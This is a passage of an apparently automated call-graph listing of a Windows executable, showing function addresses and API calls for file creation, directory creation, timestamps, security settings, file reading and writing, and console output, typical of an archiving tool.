29190->29205 29192->29190 29195 b12d90 2 API calls 29192->29195 29193 b18e41 29202 b11e89 free 29193->29202 29196 b18eb6 29195->29196 29204 b11e89 free 29196->29204 29199 b12de3 29198->29199 29206 b12b32 29199->29206 29202->29187 29203->29192 29204->29190 29205->29187 29207 b11e55 2 API calls 29206->29207 29208 b12b47 29207->29208 29208->29193 29211 b27678 29209->29211 29210 b26be9 29213 b36cb9 29210->29213 29211->29210 29279 b11e89 free 29211->29279 29214 b36ce2 29213->29214 29216 b36cc4 29213->29216 29214->29144 29215 b11e89 free ctype 29215->29216 29216->29214 29216->29215 29218 b169c9 29217->29218 29219 b16ac0 29218->29219 29220 b169f0 29218->29220 29226 b16a1b 29218->29226 29221 b12dd3 2 API calls 29219->29221 29225 b16c83 29219->29225 29220->29148 29222 b16ae9 29221->29222 29223 b12dd3 2 API calls 29222->29223 29234 b16af9 29223->29234 29224 b16d0a 29228 b16cbe 29224->29228 29229 b16d26 29224->29229 29246 b16d56 29224->29246 29225->29224 29227 b16cb7 29225->29227 29226->29220 29232 b1736b FindCloseChangeNotification 29226->29232 29308 b1692e __EH_prolog 29227->29308 29238 b16cd2 29228->29238 29280 b165a1 __EH_prolog 29228->29280 29233 b1692e 11 API calls 29229->29233 29232->29220 29233->29228 29235 b169ab 25 API calls 29234->29235 29241 b16b57 29234->29241 29237 b16b87 29235->29237 29236 b16581 FindClose 29236->29220 29239 b16c73 29237->29239 29237->29241 29238->29236 29306 b11e89 free 29239->29306 29293 b12ea8 29241->29293 29242 b16c7b 29246->29228 29248 b12dd3 2 API calls 29246->29248 29249 b16d8f 29246->29249 29247 b12d90 2 API calls 29252 b16da6 29248->29252 29251 b16581 FindClose 29249->29251 29251->29220 29256 b165a1 12 API calls 29252->29256 29258 b16dce 29256->29258 29261 b16dd2 wcscmp 29258->29261 29262 b16df4 29258->29262 29261->29262 29269 b16dea 29261->29269 29265 b1692e 11 API calls 29262->29265 29278->29150 29279->29211 29281 b16581 FindClose 29280->29281 29282 b165b9 29281->29282 29283 b165e2 29282->29283 29284 b165d4 FindFirstFileW 29282->29284 29292 b16627 29282->29292 29285 b12d90 2 API calls 29283->29285 29283->29292 29284->29283 29286 b165f3 29285->29286 29292->29238 29294 b12b32 2 API calls 29293->29294 29295 b12eb8 29294->29295 29295->29247 29306->29242 29309 b16945 29308->29309 29310 b16952 GetFileAttributesW 29309->29310 29311 b1695a 29309->29311 29310->29311 29320 b1698e 29310->29320 29312 b12d90 2 API calls 29311->29312 29311->29320 29313 b16966 29312->29313 29314 b18869 8 API calls 29313->29314 29315 b1697b 29314->29315 29320->29228 29390 b12b32 2 API calls 29389->29390 29391 b12cf4 29390->29391 29391->29157 29391->29391 29392 b6b370 free 29393 b77db0 WaitForSingleObject 29394 b77dd1 29393->29394 29395 b77dcb GetLastError 29393->29395 29396 b77dde FindCloseChangeNotification 29394->29396 29397 b77def 29394->29397 29395->29394 29396->29397 29398 b77de9 GetLastError 29396->29398 29398->29397 29399 b7f5bd __setusermatherr 29400 b7f674 29399->29400 29401 b7f5ce _initterm __getmainargs _initterm __p___initenv 29400->29401 29402 b4b0cc 29401->29402 29403 b7f629 exit _XcptFilter 29402->29403 29404 b1783f 29407 b177d1 29404->29407 29406 b1785d 29408 b177e4 29407->29408 29413 b172b9 __EH_prolog 29408->29413 29411 b1780a SetFileTime 29412 b17822 29411->29412 29412->29406 29414 b1736b FindCloseChangeNotification 29413->29414 29416 b172ce 29414->29416 29415 b17351 29415->29411 29415->29412 29416->29415 29417 b172f3 CreateFileW 29416->29417 29418 b17308 29416->29418 29417->29418 29418->29415 29419 b12d90 2 API calls 29418->29419 29420 b1731a 29419->29420 29421 b18869 8 API calls 29420->29421 29422 b17330 29421->29422 29423 b17334 CreateFileW 29422->29423 29424 b17349 29422->29424 29423->29424 29426 b11e89 free 29424->29426 29426->29415 29427 b6b426 29428 b6b42d 29427->29428 29429 b6b42a 29427->29429 29428->29429 29430 b6b431 malloc 29428->29430 29430->29429 29431 b49be6 __EH_prolog 29442 b126d9 29431->29442 29433 b49c4c 29434 b12d90 2 API calls 29433->29434 29435 b49c67 29434->29435 29436 b12d90 2 API calls 29435->29436 29437 b49c73 29436->29437 29438 b12d90 2 API calls 29437->29438 29439 b49c97 29438->29439 29440 b12d90 2 API calls 29439->29440 29441 b49ce1 29440->29441 29443 b11e55 2 API calls 29442->29443 29444 b126e6 29443->29444 29444->29433 29445 b1fd65 29448 b1b1f1 29445->29448 29446 b1fd71 29449 b1b200 29448->29449 29451 b1b214 29448->29451 29449->29451 29452 b17450 29449->29452 29451->29446 29453 b1747b SetFilePointer 29452->29453 29454 b1745f 29452->29454 29455 b174c0 29453->29455 29456 b1749f GetLastError 29453->29456 29454->29453 29455->29451 29456->29455 29457 b174ab 29456->29457 29458 b174b5 SetLastError 29457->29458 29458->29455 29459 b44261 29460 b442a0 29459->29460 29463 b4b752 29460->29463 29462 b442a7 29464 b4b767 GetTickCount 29463->29464 29465 b4b770 29463->29465 29464->29465 29468 b4b79c 29465->29468 29478 b4b99a 29465->29478 29499 b12a3d strcmp 29465->29499 29467 b4b80f 29467->29478 29487 b127b7 29467->29487 29468->29467 29468->29478 29500 b12a3d strcmp 29468->29500 29471 b4b84b 29480 b4b862 29471->29480 29505 b128ee malloc _CxxThrowException free memcpy _CxxThrowException 29471->29505 29472 b4b823 29472->29471 29501 b12895 29472->29501 29475 b4b951 29475->29478 29493 b4b618 29475->29493 29477 b4b969 fputs 29479 b4b98a 29477->29479 29478->29462 29481 b127b7 3 API calls 29479->29481 29480->29475 29506 b1207c 29480->29506 29481->29478 29483 b4b936 29510 b128ee malloc _CxxThrowException free memcpy _CxxThrowException 29483->29510 29485 b4b8ab 29485->29483 29486 b1207c 5 API calls 29485->29486 29486->29485 29488 b127df 29487->29488 29489 b127c3 29487->29489 29488->29472 29489->29488 29490 b11e55 2 API calls 29489->29490 29491 b127d6 29490->29491 29511 b11e89 free 29491->29511 29494 b4b68a 29493->29494 29495 b4b62b 29493->29495 29494->29477 29496 b4b63f fputs 29495->29496 29512 b125c7 malloc _CxxThrowException free _CxxThrowException ctype 29495->29512 29496->29494 29499->29468 29500->29467 29502 b128a4 29501->29502 29502->29502 29513 b1267b 29502->29513 29504 b128b3 29504->29471 29505->29480 29507 b12084 29506->29507 29509 b1209b 29507->29509 29523 b1425c malloc _CxxThrowException free _CxxThrowException _CxxThrowException 29507->29523 29509->29485 29510->29475 29511->29488 29512->29496 29514 b126be 29513->29514 29515 b1268f 29513->29515 29514->29504 29516 b126c4 _CxxThrowException 29515->29516 29517 b126b8 29515->29517 29518 b126d9 29516->29518 29522 b12591 malloc _CxxThrowException free memcpy ctype 29517->29522 29520 b11e55 2 API calls 29518->29520 29521 b126e6 29520->29521 29521->29504 29522->29514 29523->29509 29524 b174e7 29525 b17450 3 API calls 29524->29525 29526 b174fa 29525->29526 29527 b207e4 __EH_prolog 29528 b20818 29527->29528 29529 b20838 6 API calls 29528->29529 29565 b30b3c malloc _CxxThrowException __EH_prolog 29528->29565 29532 b20893 29529->29532 29531 b2082a _CxxThrowException 29531->29529 29533 b127b7 3 API calls 29532->29533 29536 b208fe 29532->29536 29534 b208f2 29533->29534 29566 b11e89 free 29534->29566 29537 b2098f 29536->29537 29567 b30b3c malloc _CxxThrowException __EH_prolog 29536->29567 29562 b20bbf 29537->29562 29542 b209b8 _CxxThrowException 29542->29537 29568 b19032 GetCurrentProcess OpenProcessToken 29562->29568 29565->29531 29566->29536 29567->29542 29569 b19059 LookupPrivilegeValueW 29568->29569 29570 b190af 29568->29570 29571 b190a1 29569->29571 29572 b1906b AdjustTokenPrivileges 29569->29572 29574 b190a4 FindCloseChangeNotification 29571->29574 29572->29571 29573 b19091 GetLastError 29572->29573 29573->29574 29574->29570 29575 b4876c 29648 b4a3e5 29575->29648 29577 b48779 29654 b20c42 29577->29654 29579 b487a4 29580 b487fd 29579->29580 29581 b487e6 GetStdHandle GetConsoleScreenBufferInfo 29579->29581 29582 b11e55 2 API calls 29580->29582 29581->29580 29583 b4880b 29582->29583 29728 b36946 __EH_prolog 29583->29728 29585 b48858 29741 b4a7a1 29585->29741 29649 b4a3f0 fputs 29648->29649 29650 b4a419 29648->29650 29793 b11fe9 fputc 29649->29793 29650->29577 29652 b4a409 29652->29650 29653 b4a40d fputs 29652->29653 29653->29650 29655 b20c5e 29654->29655 29658 b20c7b 29654->29658 29801 b30b3c malloc _CxxThrowException __EH_prolog 29655->29801 29657 b20c6d _CxxThrowException 29657->29658 29661 b20cb2 29658->29661 29802 b30b3c malloc _CxxThrowException __EH_prolog 29658->29802 29660 b20ca4 _CxxThrowException 29660->29661 29662 b20d31 wcscmp 29661->29662 29670 b20d45 29661->29670 29663 b20dbe 29662->29663 29662->29670 29803 b30b3c malloc _CxxThrowException __EH_prolog 29663->29803 29665 b20dcd _CxxThrowException 29665->29670 29666 b20db8 29804 b22635 6 API calls ctype 29666->29804 29668 b20e03 29805 b22635 6 API calls ctype 29668->29805 29670->29666 29671 b20ea9 29670->29671 29806 b30b3c malloc _CxxThrowException __EH_prolog 29671->29806 29673 b20eb8 _CxxThrowException 29674 b20e17 29673->29674 29677 b20f8e 29674->29677 29678 b20f54 29674->29678 29807 b30b3c malloc _CxxThrowException __EH_prolog 29674->29807 29676 b20f46 _CxxThrowException 29676->29678 29794 b2255b __EH_prolog 29677->29794 29678->29677 29808 b30b3c malloc _CxxThrowException __EH_prolog 29678->29808 29680 b20f80 _CxxThrowException 29680->29677 29682 b21031 29683 b213d5 29682->29683 29691 b210b0 29682->29691 29684 b215dd 29683->29684 29686 b2140f 29683->29686 29817 b30b3c malloc _CxxThrowException __EH_prolog 29683->29817 29685 b21649 29684->29685 29696 b215e4 29684->29696 29688 b216b4 29685->29688 29689 b2164e 29685->29689 29818 b22722 29686->29818 29693 b216bd _CxxThrowException 29688->29693 29727 b2132e 29688->29727 29690 b14eb5 14 API calls 29689->29690 29690->29727 29694 b21189 wcscmp 29691->29694 29705 b2119d 29691->29705 29692 b21401 _CxxThrowException 29692->29686 29698 b211de wcscmp 29694->29698 29694->29705 29696->29727 29830 b30b3c malloc _CxxThrowException __EH_prolog 29696->29830 29699 b211fe wcscmp 29698->29699 29698->29705 29701 b2121e 29699->29701 29699->29705 29814 b30b3c malloc _CxxThrowException __EH_prolog 29701->29814 29702 b2162f _CxxThrowException 29702->29727 29704 b2122d _CxxThrowException 29717 b2123b 29704->29717 29705->29717 29809 b14eb5 29705->29809 29813 b30b3c malloc _CxxThrowException __EH_prolog 29705->29813 29707 b21431 29708 b2152e 29707->29708 29712 b2158f 29707->29712 29826 b30b3c malloc _CxxThrowException __EH_prolog 29707->29826 29708->29712 29713 b21556 29708->29713 29827 b30b3c malloc _CxxThrowException __EH_prolog 29708->29827 29710 b211d0 _CxxThrowException 29710->29698 29711 b21520 _CxxThrowException 29711->29708 29712->29727 29829 b30b3c malloc _CxxThrowException __EH_prolog 29712->29829 29713->29712 29828 b30b3c malloc _CxxThrowException __EH_prolog 29713->29828 29714 b14eb5 14 API calls 29718 b212bc 29714->29718 29717->29714 29815 b308d0 32 API calls 29718->29815 29719 b215cf _CxxThrowException 29719->29684 29720 b21548 _CxxThrowException 29720->29713 29723 b21581 _CxxThrowException 29723->29712 29724 b212c3 29724->29727 29816 b30b3c malloc _CxxThrowException __EH_prolog 29724->29816 29726 b21320 _CxxThrowException 29726->29727 29727->29579 29892 b36cea 29728->29892 29730 b36aa2 29730->29585 29731 b12d90 malloc _CxxThrowException 29737 b36961 29731->29737 29733 b11e89 free ctype 29733->29737 29736 b56b33 _CxxThrowException 29736->29737 29737->29730 29737->29731 29737->29733 29737->29736 29740 b36a5f memcpy 29737->29740 29896 b3683e __EH_prolog 29737->29896 29907 b36ac1 malloc _CxxThrowException free memcpy _CxxThrowException 29737->29907 29908 b2000a 29737->29908 29913 b14268 29737->29913 29919 b362d5 9 API calls 29737->29919 29740->29737 29742 b4a7a9 _CxxThrowException 29741->29742 29743 b4885f 29741->29743 29742->29743 29744 b35de6 __EH_prolog 29743->29744 29745 b35e00 29744->29745 29746 b12d90 2 API calls 29745->29746 29747 b35e32 29746->29747 29748 b3683e 9 API calls 29747->29748 29749 b35e53 29748->29749 29938 b11e89 free 29749->29938 29751 b35e5b 29939 b11e89 free 29751->29939 29753 b35e66 29754 b2000a 3 API calls 29753->29754 29755 b35e80 29754->29755 29756 b14268 3 API calls 29755->29756 29757 b35e88 29756->29757 29758 b56b33 _CxxThrowException 29757->29758 29759 b35e92 29758->29759 29793->29652 29796 b2257e 29794->29796 29800 b22626 29794->29800 29795 b12d90 malloc _CxxThrowException 29795->29796 29796->29795 29797 b56b33 _CxxThrowException 29796->29797 29799 b11e89 free ctype 29796->29799 29796->29800 29831 b2286f malloc _CxxThrowException __EH_prolog 29796->29831 29797->29796 29799->29796 29800->29682 29801->29657 29802->29660 29803->29665 29804->29668 29805->29674 29806->29673 29807->29676 29808->29680 29810 b14ee0 29809->29810 29811 b14ec0 29809->29811 29810->29705 29811->29810 29832 b14b04 __EH_prolog 29811->29832 29813->29710 29814->29704 29815->29724 29816->29726 29817->29692 29819 b22734 29818->29819 29823 b22730 29818->29823 29890 b228d2 free ctype 29819->29890 29821 b2273b 29822 b22760 29821->29822 29824 b2274b _CxxThrowException 29821->29824 29822->29823 29891 b2286f malloc _CxxThrowException __EH_prolog 29822->29891 29823->29707 29824->29822 29826->29711 29827->29720 29828->29723 29829->29719 29830->29702 29831->29796 29833 b14b34 29832->29833 29834 b14b1f _CxxThrowException 29832->29834 29860 b14385 __EH_prolog 29833->29860 29834->29833 29836 b14b4a 29837 b12d90 2 API calls 29836->29837 29838 b14b9a 29837->29838 29841 b14bc2 wcscmp 29838->29841 29842 b14bd5 29838->29842 29841->29842 29851 b14c4a 29842->29851 29877 b14dae wcscmp wcscmp 29842->29877 29843 b14c19 wcscmp 29844 b14bf2 29843->29844 29845 b14c2f wcscmp 29843->29845 29844->29843 29844->29851 29845->29844 29846 b14cb2 29847 b36cb9 free 29846->29847 29848 b14d1e 29846->29848 29849 b14cf2 29847->29849 29880 b14755 CharUpperW _CxxThrowException 29848->29880 29853 b56b33 _CxxThrowException 29849->29853 29878 b14a59 CharUpperW 29851->29878 29852 b14d7c 29881 b11e89 free 29852->29881 29854 b14d0d 29853->29854 29856 b11524 3 API calls 29854->29856 29857 b14d16 29856->29857 29879 b11e89 free 29857->29879 29858 b14d90 29858->29811 29861 b36cb9 free 29860->29861 29862 b143a1 29861->29862 29863 b12d90 2 API calls 29862->29863 29876 b14427 29862->29876 29875 b143b2 29863->29875 29864 b143fa 29865 b12fd0 3 API calls 29864->29865 29866 b1440b 29865->29866 29868 b56b33 _CxxThrowException 29866->29868 29869 b14413 29868->29869 29871 b11524 3 API calls 29869->29871 29870 b56b33 _CxxThrowException 29870->29875 29872 b1441f 29871->29872 29888 b11e89 free 29872->29888 29873 b11524 3 API calls 29873->29875 29875->29864 29875->29870 29875->29873 29882 b12fd0 29875->29882 29876->29836 29877->29844 29878->29846 29879->29848 29880->29852 29881->29858 29883 b12fde 29882->29883 29885 b12ff1 29882->29885 29884 b11e55 2 API calls 29883->29884 29886 b12fe8 29884->29886 29885->29875 29889 b11e89 free 29886->29889 29888->29876 29889->29885 29890->29821 29891->29822 29893 b36d12 29892->29893 29894 b36cf5 29892->29894 29893->29737 29894->29893 29920 b11e89 free 29894->29920 29921 b135a7 __EH_prolog 29896->29921 29899 b135a7 6 API calls 29903 b36881 29899->29903 29900 b3691e 29900->29737 29901 b12d90 malloc _CxxThrowException 29901->29903 29902 b56b33 _CxxThrowException 29902->29903 29903->29900 29903->29901 29903->29902 29904 b368c8 wcscmp 29903->29904 29906 b11e89 free ctype 29903->29906 29935 b3673f malloc _CxxThrowException __EH_prolog 29903->29935 29904->29903 29906->29903 29907->29737 29909 b56b33 _CxxThrowException 29908->29909 29910 b20012 29909->29910 29911 b11e55 2 API calls 29910->29911 29912 b20019 29911->29912 29912->29737 29914 b14275 29913->29914 29915 b14293 29913->29915 29916 b14281 29914->29916 29937 b11e89 free 29914->29937 29915->29737 29916->29915 29918 b11e55 2 API calls 29916->29918 29918->29915 29919->29737 29920->29894 29922 b36cb9 free 29921->29922 29923 b135c3 29922->29923 29924 b12d90 2 API calls 29923->29924 29929 b1363e 29923->29929 29932 b135d4 29924->29932 29925 b1361c 29926 b13636 29925->29926 29928 b56b33 _CxxThrowException 29925->29928 29936 b11e89 free 29926->29936 29931 b1362a 29928->29931 29929->29899 29930 b56b33 _CxxThrowException 29930->29932 29933 b11524 3 API calls 29931->29933 29932->29925 29932->29930 29934 b11524 3 API calls 29932->29934 29933->29926 29934->29932 29935->29903 29936->29929 29937->29916 29938->29751 29939->29753 29943 b180e8 __EH_prolog 29944 b18104 29943->29944 29945 b12d90 2 API calls 29944->29945 29946 b1810c 29945->29946 29947 b169ab 28 API calls 29946->29947 29948 b1811b 29947->29948 29949 b18139 29948->29949 29950 b1811f 29948->29950 29953 b18140 29949->29953 29954 b1814b 29949->29954 29951 b18145 29950->29951 29952 b1812c SetLastError 29950->29952 29955 b18149 29951->29955 29968 b18222 __EH_prolog 29951->29968 29952->29955 29976 b15b2f __EH_prolog 29953->29976 29992 b181b9 37 API calls ctype 29954->29992 29994 b11e89 free 29955->29994 29960 b18150 29961 b1816a 29960->29961 29962 b1817f 29960->29962 29963 b1736b FindCloseChangeNotification 29961->29963 29964 b1736b FindCloseChangeNotification 29962->29964 29965 b18172 29963->29965 29964->29951 29993 b11e89 free 29965->29993 29967 b1817a 29995 b1790f 29968->29995 29971 b18261 DeviceIoControl 29974 b1736b FindCloseChangeNotification 29971->29974 29972 b18255 29973 b1736b FindCloseChangeNotification 29972->29973 29975 b1825d 29973->29975 29974->29975 29975->29955 29977 b1692e 11 API calls 29976->29977 29978 b15b44 29977->29978 29979 b15b4d 29978->29979 29980 b12dd3 2 API calls 29978->29980 29979->29951 29981 b15b7a 29980->29981 29982 b12ea8 2 API calls 29981->29982 29983 b15b9a 29981->29983 29990 b15bb7 29982->29990 30028 b11e89 free 29983->30028 29986 b15bca GetLastError 29987 b15c49 29986->29987 29986->29990 30027 b11e89 free 29987->30027 29989 b15c13 29989->29987 29991 b12fd0 3 API calls 29989->29991 29990->29986 29990->29987 29990->29989 29998 b15c70 __EH_prolog 29990->29998 29991->29989 29992->29960 29993->29967 29994->29967 29996 b172b9 12 API calls 29995->29996 29997 b17929 29996->29997 29997->29971 29997->29972 29999 b15c87 29998->29999 30000 b15cb5 29999->30000 30001 b15c94 CreateDirectoryW 29999->30001 30002 b15d4b GetLastError 30000->30002 30004 b12d90 2 API calls 30000->30004 30003 b15ca8 GetLastError 30001->30003 30021 b15ca1 30001->30021 30005 b15d58 30002->30005 30002->30021 30003->30000 30003->30002 30006 b15cc5 30004->30006 30009 b12d90 2 API calls 30005->30009 30007 b18869 8 API calls 30006->30007 30008 b15cda 30007->30008 30011 b15d3e 30008->30011 30012 b15cde CreateDirectoryW 30008->30012 30010 b15d6b 30009->30010 30013 b169ab 28 API calls 30010->30013 30030 b11e89 free 30011->30030 30014 b15cf1 GetLastError 30012->30014 30015 b15ced 30012->30015 30019 b15d80 30013->30019 30014->30015 30017 b15cfe 30014->30017 30015->30019 30022 b12d90 2 API calls 30017->30022 30018 b15d4a 30018->30002 30031 b11e89 free 30019->30031 30021->29990 30023 b15d0e 30022->30023 30024 b169ab 28 API calls 30023->30024 30025 b15d1f 30024->30025 30029 b11e89 free 30025->30029 30027->29983 30028->29979 30029->30015 30030->30018 30031->30021 30032 b3bce8 30033 b3bcf0 30032->30033 30048 b3beb9 30032->30048 30033->30048 30061 b144d2 malloc _CxxThrowException 30033->30061 30035 b3bdc9 30036 b12d90 2 API calls 30035->30036 30037 b3bdd4 30036->30037 30038 b3be68 30037->30038 30040 b3be6d 30037->30040 30041 b3be1d 30037->30041 30069 b11e89 free 30038->30069 30066 b3680a CharUpperW 30040->30066 30044 b12d90 2 API calls 30041->30044 30042 b3beb1 30070 b11e89 free 30042->30070 30047 b3be25 30044->30047 30046 b3be78 30067 b2eb85 6 API calls ctype 30046->30067 30049 b12d90 2 API calls 30047->30049 30051 b3be33 30049->30051 30062 b2eb85 6 API calls ctype 30051->30062 30052 b3be94 30068 b11e89 free 30052->30068 30054 b3be44 30063 b11e89 free 30054->30063 30057 b3be58 30064 b11e89 free 30057->30064 30059 b3be60 30065 b11e89 free 30059->30065 30061->30035 30062->30054 30063->30057 30064->30059 30065->30038 30066->30046 30067->30052 30068->30038 30069->30042 30070->30048 30071 b2006e 30073 b20073 30071->30073 30072 b20092 30073->30072 30075 b4e539 __EH_prolog 30073->30075 30078 b4e578 __EH_prolog 30075->30078 30077 b4e559 30077->30073 30079 b4e594 30078->30079 30087 b4ef37 30079->30087 30082 b4ef37 4 API calls 30083 b4e5c8 30082->30083 30084 b4e665 30083->30084 30095 b1c130 30083->30095 30101 b6b383 VirtualAlloc 30083->30101 30084->30077 30088 b4ef4a 30087->30088 30094 b4e5bb 30087->30094 30089 b4ef67 30088->30089 30090 b4ef52 _CxxThrowException 30088->30090 30102 b11e89 free 30089->30102 30090->30089 30092 b4ef6e 30093 b11e55 2 API calls 30092->30093 30093->30094 30094->30082 30099 b1c143 30095->30099 30096 b1c34d 30096->30084 30099->30096 30100 b1c2ef memmove 30099->30100 30103 b1fe65 30099->30103 30108 b1fed3 30099->30108 30100->30099 30101->30084 30102->30092 30104 b1fe79 30103->30104 30105 b1fea8 30104->30105 30113 b1c9d6 30104->30113 30117 b1aeff 30104->30117 30105->30099 30109 b1fee0 30108->30109 30110 b1ff0a 30109->30110 30136 b56e4f 30109->30136 30142 b56da4 30109->30142 30110->30099 30114 b1c9fa 30113->30114 30115 b1ca19 30114->30115 30116 b1aeff 6 API calls 30114->30116 30115->30104 30116->30115 30128 b1af0c 30117->30128 30120 b1b141 GetLastError 30126 b1af41 30120->30126 30121 b1b0b2 30124 b1b0d0 memcpy 30121->30124 30121->30126 30122 b1b07e 30125 b17450 3 API calls 30122->30125 30127 b1b0a4 30122->30127 30123 b17450 3 API calls 30123->30128 30124->30126 30125->30127 30126->30104 30127->30126 30130 b1789b 30127->30130 30128->30121 30128->30122 30128->30123 30128->30126 30128->30127 30134 b1786e ReadFile 30128->30134 30131 b178a8 30130->30131 30135 b1786e ReadFile 30131->30135 30133 b178b9 30133->30120 30133->30126 30134->30128 30135->30133 30137 b56e5e 30136->30137 30140 b56f38 30137->30140 30146 b1b5a3 30137->30146 30149 b56c62 __EH_prolog 30137->30149 30155 b56de7 71 API calls 30137->30155 30140->30109 30143 b56dae 30142->30143 30144 b56de3 30143->30144 30397 b25e89 __EH_prolog 30143->30397 30144->30109 30156 b179c1 30146->30156 30148 b1b5bc 30148->30137 30150 b56c89 30149->30150 30163 b24ffe __EH_prolog 30150->30163 30151 b56ce7 30152 b56ced 30151->30152 30181 b25513 __EH_prolog 30151->30181 30152->30137 30155->30137 30159 b179ce 30156->30159 30158 b179fa 30158->30148 30159->30158 30160 b17987 30159->30160 30161 b17995 30160->30161 30162 b17998 WriteFile 30160->30162 30161->30162 30162->30159 30176 b25026 30163->30176 30164 b252d7 30165 b252e0 30164->30165 30166 b25397 30164->30166 30167 b11e55 2 API calls 30165->30167 30170 b252ef 30165->30170 30172 b253b1 30166->30172 30173 b2544d 30166->30173 30177 b25120 30166->30177 30167->30170 30241 b324e9 __EH_prolog 30170->30241 30171 b251d3 30171->30164 30171->30177 30240 b26595 free memmove ctype 30171->30240 30175 b11e55 2 API calls 30172->30175 30185 b248e3 __EH_prolog 30173->30185 30175->30177 30176->30171 30176->30177 30239 b142b1 CharUpperW 30176->30239 30177->30151 30178 b2532c 30248 b11e89 free 30178->30248 30182 b2553e 30181->30182 30183 b25533 30181->30183 30363 b44941 EnterCriticalSection 30182->30363 30183->30152 30249 b241b9 __EH_prolog 30185->30249 30187 b24900 30210 b24b10 30187->30210 30251 b24329 __EH_prolog 30187->30251 30190 b324e9 4 API calls 30191 b2494a 30190->30191 30192 b24959 30191->30192 30317 b244ba 6 API calls ctype 30191->30317 30193 b12ea8 2 API calls 30192->30193 30195 b24965 30193->30195 30196 b249a3 30195->30196 30318 b11e89 free 30195->30318 30198 b24a42 30196->30198 30199 b12d90 2 API calls 30196->30199 30202 b24a4e 30198->30202 30268 b245b7 __EH_prolog 30198->30268 30201 b249cb 30199->30201 30319 b11e89 free 30201->30319 30205 b24ae0 30202->30205 30212 b24b3a 30202->30212 30238 b24a74 30202->30238 30213 b24b00 30205->30213 30205->30238 30206 b24ef3 30329 b11e89 free 30206->30329 30207 b24b9e 30209 b11e55 2 API calls 30207->30209 30223 b24bb0 30209->30223 30210->30177 30211 b249ee 30211->30198 30217 b12ea8 2 API calls 30211->30217 30212->30207 30221 b24bc7 30212->30221 30212->30238 30322 b11e89 free 30213->30322 30215 b24b08 30323 b11e89 free 30215->30323 30218 b24a1e 30217->30218 30320 b32132 malloc _CxxThrowException free 30218->30320 30220 b24a2a 30321 b11e89 free 30220->30321 30225 b24bfa 30221->30225 30221->30238 30227 b24cff 30223->30227 30229 b24d86 30223->30229 30223->30238 30224 b12ea8 2 API calls 30226 b24e40 30224->30226 30324 b11e89 free 30225->30324 30326 b2675d malloc _CxxThrowException __EH_prolog _CxxThrowException 30226->30326 30232 b14268 3 API calls 30227->30232 30229->30224 30229->30238 30231 b24e64 30234 b24d2c 30232->30234 30233 b24c0f 30325 b11e89 free 30233->30325 30237 b11e55 2 API calls 30234->30237 30237->30238 30328 b11e89 free 30238->30328 30239->30176 30240->30164 30242 b12d90 2 API calls 30241->30242 30243 b32509 30242->30243 30244 b12ea8 2 API calls 30243->30244 30245 b32541 30244->30245 30362 b11e89 free 30245->30362 30247 b32549 30247->30178 30248->30177 30250 b241fc 30249->30250 30250->30187 30252 b24349 30251->30252 30254 b24372 30252->30254 30330 b32357 7 API calls ctype 30252->30330 30255 b12ea8 2 API calls 30254->30255 30267 b24413 30254->30267 30256 b2438f 30255->30256 30331 b32132 malloc _CxxThrowException free 30256->30331 30258 b2439b 30259 b243a6 30258->30259 30260 b243be 30258->30260 30332 b2654c malloc _CxxThrowException __EH_prolog _CxxThrowException 30259->30332 30263 b243ad 30260->30263 30333 b14aad wcscmp 30260->30333 30335 b11e89 free 30263->30335 30264 b243cb 30264->30263 30334 b2654c malloc _CxxThrowException __EH_prolog _CxxThrowException 30264->30334 30267->30190 30269 b245da 30268->30269 30270 b12d90 2 API calls 30269->30270 30271 b245e2 30270->30271 30272 b169ab 28 API calls 30271->30272 30273 b245f6 30272->30273 30279 b24826 30273->30279 30282 b245fe 30273->30282 30274 b246fa 30276 b24703 30274->30276 30277 b2473d 30274->30277 30275 b24731 30361 b11e89 free 30275->30361 30355 b1ac19 malloc _CxxThrowException free __EH_prolog ctype 30276->30355 30280 b24742 30277->30280 30291 b247b1 30277->30291 30279->30275 30285 b12ea8 2 API calls 30279->30285 30282->30274 30297 b2470e 30282->30297 30350 b248c8 malloc _CxxThrowException 30282->30350 30284 b246c7 30284->30202 30296 b24845 30285->30296 30290 b24626 30293 b12d35 2 API calls 30290->30293 30291->30275 30298 b12d90 2 API calls 30296->30298 30358 b11e89 free 30297->30358 30317->30192 30318->30196 30319->30211 30320->30220 30321->30198 30322->30215 30323->30210 30324->30233 30325->30210 30326->30231 30328->30206 30329->30210 30330->30254 30331->30258 30332->30263 30333->30264 30334->30263 30335->30267 30350->30290 30358->30284 30361->30284 30362->30247 30364 b44963 30363->30364 30382 b44a9b 30364->30382 30384 b44b28 30364->30384 30365 b44b07 30370 b44b0c LeaveCriticalSection 30365->30370 30367 b44af0 30369 b4b752 11 API calls 30367->30369 30369->30365 30370->30183 30372 b449dc 30374 b449e8 fputs 30372->30374 30383 b44a11 30374->30383 30376 b44a5f 30377 b44a65 fputs 30376->30377 30378 b44a90 30376->30378 30392 b1224a 30377->30392 30395 b11fe9 fputc 30378->30395 30381 b44a85 fputs 30381->30378 30382->30365 30382->30367 30396 b1275a malloc _CxxThrowException free ctype 30382->30396 30389 b12059 30383->30389 30385 b449cc 30384->30385 30386 b44b32 30384->30386 30388 b1275a malloc _CxxThrowException free ctype 30385->30388 30386->30385 30387 b4b618 5 API calls 30386->30387 30387->30385 30388->30372 30390 b1207c 5 API calls 30389->30390 30391 b1206b fputs 30390->30391 30391->30376 30393 b11944 30392->30393 30394 b12261 fputs 30393->30394 30394->30381 30395->30382 30396->30367 30399 b25ed6 30397->30399 30400 b25ea9 30397->30400 30403 b25cbe __EH_prolog 30399->30403 30400->30144 30401 b25f2f 30401->30400 30402 b25f9c SetFileSecurityW 30401->30402 30402->30400 30405 b25ce5 30403->30405 30404 b25d63 30408 b25dfc 30404->30408 30409 b25d97 30404->30409 30405->30404 30407 b1fed3 70 API calls 30405->30407 30407->30404 30412 b11e89 free 30408->30412 30413 b11e89 free 30409->30413 30411 b25e04 30411->30401 30412->30411 30413->30411 30414 b3c1af 30415 b3c1d6 30414->30415 30416 b3c670 3 API calls 30415->30416 30417 b3c29e 30416->30417 30418 b3c3ba 30417->30418 30424 b3c52f 30417->30424 30419 b3c5c6 30418->30419 30467 b380e9 __EH_prolog 30418->30467 30481 b11e89 free 30419->30481 30422 b3c5ce 30482 b11e89 free 30422->30482 30423 b3c3d4 30423->30419 30426 b3c3de 30423->30426 30479 b11e89 free 30424->30479 30429 b56b33 _CxxThrowException 30426->30429 30428 b3c5d6 30431 b3206a 2 API calls 30428->30431 30432 b3c3e6 30429->30432 30430 b3c558 30480 b11e89 free 30430->30480 30441 b3c487 30431->30441 30469 b11e89 free 30432->30469 30434 b3c560 30435 b3206a 2 API calls 30434->30435 30435->30441 30437 b3c3fd 30470 